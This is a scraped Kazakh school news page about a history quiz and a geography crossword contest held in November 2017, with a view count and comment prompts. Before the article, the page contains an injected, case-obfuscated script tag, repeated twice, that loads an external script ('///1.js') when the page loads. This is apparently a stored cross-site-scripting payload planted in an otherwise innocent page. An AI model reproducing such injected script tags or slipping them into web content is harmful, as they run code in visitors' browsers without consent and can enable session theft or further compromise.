<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.11.2017

Қарашаның 16-сы күні 8-9 сынып аралығында тарих пәні

мұғалімі Ахметова Қымбат Төлегенқызы «Тарихи күндер мен ұлы адамдар» атты

викториналық іс-шара өткізді.

Іс-шара барысында оқушылар тарихи тұлғалар туралы өз

білімдерін, пікірлерін ортаға салды. Кеш барысында «Болашақ» тобы жеңіске

жетіп, сыйлықпен марапатталды.

 

Қарашаның 17-сі күні 5-11 сынып аралығында  география пәні мұғалімі Жунусов Балғабай

Жорабекұлы «Еліміздің

қалаларын білесің бе?»атты сайыс сабақ өткізді.

Сабақ барысында әр сынып 

сөзжұмбақ, ребус дайындап, сыныптар арасында өзара сайысқа түсті. Сайыс

барысында «Ең қызықты сөзжұмбақ» номинациясына

6-сынып ие болса, «Ең мағыналы сөзжұмбақ» номинациясына

11-сынып,

 «Ең әдемі

сөзжұмбақ» номинациясына 5-сынып ие болып, мақтау қағазымен марапатталды.

Просмотров: 848


Пікір қосу



Деректерді қолтаңбаға қосу